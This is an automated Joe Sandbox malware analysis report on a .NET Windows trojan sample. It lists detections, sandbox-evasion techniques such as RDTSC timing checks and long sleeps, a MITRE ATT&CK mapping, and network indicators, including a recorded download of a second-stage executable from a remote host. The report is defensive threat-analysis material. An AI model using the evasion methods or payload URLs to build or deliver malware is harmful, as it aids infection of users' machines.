Play interactive tour

Edit tour

Windows Analysis Report bPNK0VeG79.exe

Overview

General Information

Sample Name:	bPNK0VeG79.exe
Analysis ID:	470806
MD5:	19e4c4f601f1459b6755776c7aec2604
SHA1:	71d8398652a891d09492db64bc1458349ba4cdbc
SHA256:	9460ffe580332fe64bb4f35bb63dc6a4302f3613718a04dc0986cea989160039
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Tries to detect virtualization through RDTSC time measurements

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Drops PE files

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Binary contains a suspicious time stamp

Detected potential crypto function

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Process Tree

System is w10x64

bPNK0VeG79.exe (PID: 2872 cmdline: 'C:\Users\user\Desktop\bPNK0VeG79.exe' MD5: 19E4C4F601F1459B6755776C7AEC2604)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: bPNK0VeG79.exe	Virustotal: Detection: 27%			Perma Link
Source: bPNK0VeG79.exe	ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACC2E35 lstrcmpA,CryptDecodeObject,CertFreeCertificateContext,	0_2_00007FFD7ACC2E35
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACC2E00 lstrcmpA,CryptDecodeObject,CertFreeCertificateContext,LocalAlloc,CertFreeCertificateContext,CryptDecodeObject,CertFreeCertificateContext,CertFreeCertificateContext,	0_2_00007FFD7ACC2E00
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACC27C0 CryptQueryObject,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,CryptMsgGetParam,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,LocalAlloc,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,CryptMsgGetParam,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,	0_2_00007FFD7ACC27C0

Source: bPNK0VeG79.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: clrjit.pdb source: bPNK0VeG79.exe, 00000000.00000002.355063700.000000001BA70000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\AccessibilityImprovements.pdb source: bPNK0VeG79.exe

Source: global traffic

HTTP traffic detected: GET /Buld2.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive

Source: bPNK0VeG79.exe	String found in binary or memory: http://epidemicsound.com/referral/cee...)
Source: bPNK0VeG79.exe, 00000000.00000002.353788316.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bPNK0VeG79.exe	String found in binary or memory: http://secureteam.net/ErrorReporting.asmx
Source: bPNK0VeG79.exe	String found in binary or memory: http://secureteam.net/webservices/CreateErrorReport
Source: bPNK0VeG79.exe	String found in binary or memory: http://secureteam.net/webservices/T
Source: bPNK0VeG79.exe	String found in binary or memory: http://secureteam.net/webservices/TU
Source: bPNK0VeG79.exe	String found in binary or memory: http://secureteam.net/webservices/Y
Source: bPNK0VeG79.exe, 00000000.00000002.353788316.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: http://swretjhwrtj.gq
Source: bPNK0VeG79.exe, 00000000.00000002.353788316.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: http://swretjhwrtj.gq/Buld2.exe
Source: bPNK0VeG79.exe, 00000000.00000002.353912370.0000000002F44000.00000004.00000001.sdmp	String found in binary or memory: http://swretjhwrtj.gqx
Source: bPNK0VeG79.exe	String found in binary or memory: http://www.epidemicsound.com)
Source: bPNK0VeG79.exe	String found in binary or memory: https://bit.ly/3zr3UY1
Source: bPNK0VeG79.exe	String found in binary or memory: https://discord.com/invite/magicrust
Source: bPNK0VeG79.exe	String found in binary or memory: https://rustycloth.ru
Source: bPNK0VeG79.exe	String found in binary or memory: https://shop.magic-rust.ru
Source: bPNK0VeG79.exe	String found in binary or memory: https://vk.com/magic_manager
Source: bPNK0VeG79.exe	String found in binary or memory: https://vk.com/magicow
Source: bPNK0VeG79.exe	String found in binary or memory: https://vk.com/magicowrust
Source: bPNK0VeG79.exe	String found in binary or memory: https://vk.com/rustycloth
Source: bPNK0VeG79.exe, 00000000.00000002.353958356.0000000002F69000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: bPNK0VeG79.exe	String found in binary or memory: https://www.instagram.com/dergidverih...

Source: unknown

DNS traffic detected: queries for: swretjhwrtj.gq

Source: global traffic

HTTP traffic detected: GET /Buld2.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive

Source: bPNK0VeG79.exe	Binary or memory string: OriginalFilename vs bPNK0VeG79.exe
Source: bPNK0VeG79.exe, 00000000.00000002.352733784.0000000000B75000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAccessibilityImprovements.exeT vs bPNK0VeG79.exe
Source: bPNK0VeG79.exe, 00000000.00000002.352951762.0000000000F8C000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs bPNK0VeG79.exe
Source: bPNK0VeG79.exe, 00000000.00000002.354913557.000000001B930000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs bPNK0VeG79.exe
Source: bPNK0VeG79.exe, 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs bPNK0VeG79.exe
Source: bPNK0VeG79.exe, 00000000.00000002.354843237.000000001B750000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs bPNK0VeG79.exe
Source: bPNK0VeG79.exe	Binary or memory string: OriginalFilenameAccessibilityImprovements.exeT vs bPNK0VeG79.exe

Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACC1D70	0_2_00007FFD7ACC1D70
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACC3270	0_2_00007FFD7ACC3270
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACC14D0	0_2_00007FFD7ACC14D0

Source: .dll.0.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: .dll.0.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: bPNK0VeG79.exe	Virustotal: Detection: 27%
Source: bPNK0VeG79.exe	ReversingLabs: Detection: 15%

Source: bPNK0VeG79.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bPNK0VeG79.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

File created: C:\Users\user\AppData\Local\Temp\108b7f4f-5686-4e2a-8f63-f5f2c7239d1c

Jump to behavior

Source: classification engine

Classification label: mal52.evad.winEXE@1/2@1/1

Source: C:\Users\user\Desktop\bPNK0VeG79.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: bPNK0VeG79.exe, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: bPNK0VeG79.exe, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: bPNK0VeG79.exe, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
Source: 0.0.bPNK0VeG79.exe.b70000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: 0.0.bPNK0VeG79.exe.b70000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.bPNK0VeG79.exe.b70000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
Source: 0.2.bPNK0VeG79.exe.b70000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: 0.2.bPNK0VeG79.exe.b70000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.bPNK0VeG79.exe.b70000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: bPNK0VeG79.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: bPNK0VeG79.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: bPNK0VeG79.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: clrjit.pdb source: bPNK0VeG79.exe, 00000000.00000002.355063700.000000001BA70000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\AccessibilityImprovements.pdb source: bPNK0VeG79.exe

Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACE0AA9 push rsp; retf		0_2_00007FFD7ACE0AD9
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Code function: 0_2_00007FFD7ACC5E28 push rbp; retf		0_2_00007FFD7ACC5E29

Source: bPNK0VeG79.exe

Static PE information: 0xF3E88B15 [Thu Sep 3 07:24:05 2099 UTC]

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Code function: 0_2_00007FFD7ACC83A0 GetCurrentProcess,GetCurrentProcess,GetFileVersionInfoSizeW,GetProcessHeap,HeapAlloc,GetFileVersionInfoW,VerQueryValueA,LoadLibraryW,GetProcAddress,GetProcessHeap,HeapFree,

0_2_00007FFD7ACC83A0

Source: initial sample

Static PE information: section name: .text entropy: 7.40200609771

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

File created: C:\Users\user\AppData\Local\Temp\108b7f4f-5686-4e2a-8f63-f5f2c7239d1c\ .dll

Jump to dropped file

Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

RDTSC instruction interceptor: First address: 00007FFD7ACC1F0F second address: 00007FFD7ACC1F90 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov dword ptr [esp+28h], eax 0x0000000e dec eax 0x0000000f mov eax, dword ptr [esp+30h] 0x00000013 dec eax 0x00000014 mov ecx, dword ptr [esp+28h] 0x00000018 dec eax 0x00000019 sub ecx, eax 0x0000001b dec eax 0x0000001c mov eax, ecx 0x0000001e dec eax 0x0000001f add esp, 48h 0x00000022 ret 0x00000023 dec eax 0x00000024 mov dword ptr [00010326h], eax 0x0000002a mov dword ptr [esp+28h], 00000000h 0x00000032 jmp 00007F6830BA02FCh 0x00000034 mov eax, dword ptr [esp+50h] 0x00000038 cmp dword ptr [esp+28h], eax 0x0000003c jnl 00007F6830BA0334h 0x0000003e rdtsc

Source: C:\Users\user\Desktop\bPNK0VeG79.exe TID: 5944	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\bPNK0VeG79.exe TID: 6004	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Code function: 0_2_00007FFD7ACC1F40 rdtsc

0_2_00007FFD7ACC1F40

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: bPNK0VeG79.exe, 00000000.00000002.354913557.000000001B930000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: bPNK0VeG79.exe, 00000000.00000002.354913557.000000001B930000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: bPNK0VeG79.exe, 00000000.00000002.354913557.000000001B930000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: bPNK0VeG79.exe, 00000000.00000002.355063700.000000001BA70000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bPNK0VeG79.exe, 00000000.00000002.354913557.000000001B930000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

0_2_00007FFD7ACC83A0

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Code function: 0_2_00007FFD7ACC4F70 EnumProcessModules,K32EnumProcessModules,GetProcessHeap,HeapAlloc,EnumProcessModules,K32EnumProcessModules,GetModuleInformation,K32GetModuleInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualQuery,

0_2_00007FFD7ACC4F70

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Code function: 0_2_00007FFD7ACC1F40 rdtsc

0_2_00007FFD7ACC1F40

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Queries volume information: C:\Users\user\Desktop\bPNK0VeG79.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Code function: 0_2_00007FFD7ACC10A0 GetVersionExW,

0_2_00007FFD7ACC10A0

Source: C:\Users\user\Desktop\bPNK0VeG79.exe

Code function: 0_2_00007FFD7ACC6020 MessageBoxW,GetSystemTimeAsFileTime,CompareFileTime,MessageBoxW,

0_2_00007FFD7ACC6020

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Path Interception	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Information Discovery114	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
bPNK0VeG79.exe	28%	Virustotal		Browse
bPNK0VeG79.exe	15%	ReversingLabs	ByteCode-MSIL.Trojan.Heracles

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\108b7f4f-5686-4e2a-8f63-f5f2c7239d1c\ .dll	2%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
swretjhwrtj.gq	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://secureteam.net/ErrorReporting.asmx	0%	Virustotal		Browse
http://secureteam.net/ErrorReporting.asmx	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/Y	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/CreateErrorReport	0%	Virustotal		Browse
http://secureteam.net/webservices/CreateErrorReport	0%	Avira URL Cloud	safe
https://rustycloth.ru	0%	Virustotal		Browse
https://rustycloth.ru	0%	Avira URL Cloud	safe
http://www.epidemicsound.com)	0%	Avira URL Cloud	safe
http://swretjhwrtj.gq/Buld2.exe	0%	Avira URL Cloud	safe
https://discord.com/invite/magicrust	0%	Avira URL Cloud	safe
http://swretjhwrtj.gq	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/T	0%	Avira URL Cloud	safe
http://swretjhwrtj.gqx	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/TU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
swretjhwrtj.gq	172.67.216.236	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://swretjhwrtj.gq/Buld2.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://secureteam.net/ErrorReporting.asmx	bPNK0VeG79.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://secureteam.net/webservices/Y	bPNK0VeG79.exe	false	Avira URL Cloud: safe	unknown
https://vk.com/rustycloth	bPNK0VeG79.exe	false		high
http://secureteam.net/webservices/CreateErrorReport	bPNK0VeG79.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://shop.magic-rust.ru	bPNK0VeG79.exe	false		high
https://vk.com/magicow	bPNK0VeG79.exe	false		high
https://rustycloth.ru	bPNK0VeG79.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.epidemicsound.com)	bPNK0VeG79.exe	false	Avira URL Cloud: safe	low
https://discord.com/invite/magicrust	bPNK0VeG79.exe	false	Avira URL Cloud: safe	unknown
https://bit.ly/3zr3UY1	bPNK0VeG79.exe	false		high
https://vk.com/magic_manager	bPNK0VeG79.exe	false		high
https://www.instagram.com/dergidverih...	bPNK0VeG79.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	bPNK0VeG79.exe, 00000000.00000002.353788316.0000000002E91000.00000004.00000001.sdmp	false		high
http://swretjhwrtj.gq	bPNK0VeG79.exe, 00000000.00000002.353788316.0000000002E91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.com/magicowrust	bPNK0VeG79.exe	false		high
http://epidemicsound.com/referral/cee...)	bPNK0VeG79.exe	false		high
http://secureteam.net/webservices/T	bPNK0VeG79.exe	false	Avira URL Cloud: safe	unknown
http://swretjhwrtj.gqx	bPNK0VeG79.exe, 00000000.00000002.353912370.0000000002F44000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	bPNK0VeG79.exe, 00000000.00000002.353958356.0000000002F69000.00000004.00000001.sdmp	false		high
http://secureteam.net/webservices/TU	bPNK0VeG79.exe	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.216.236	swretjhwrtj.gq	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	470806
Start date:	24.08.2021
Start time:	17:01:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	bPNK0VeG79.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.evad.winEXE@1/2@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.6% (good quality ratio 0.5%) Quality average: 59.3% Quality standard deviation: 37.9%
HCA Information:	Successful, ratio: 61% Number of executed functions: 21 Number of non-executed functions: 22
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:02:29	API Interceptor	1x Sleep call for process: bPNK0VeG79.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.216.236	t7p1ekMto0.exe	Get hash	malicious	Browse	swretjhwrtj.gq/GPU.exe
	GzsKHwvBmG.exe	Get hash	malicious	Browse	swretjhwrtj.gq/@Rarenut0.exe
	69CDTt1pad.exe	Get hash	malicious	Browse	swretjhwrtj.gq/@Rarenut0.exe

Domains

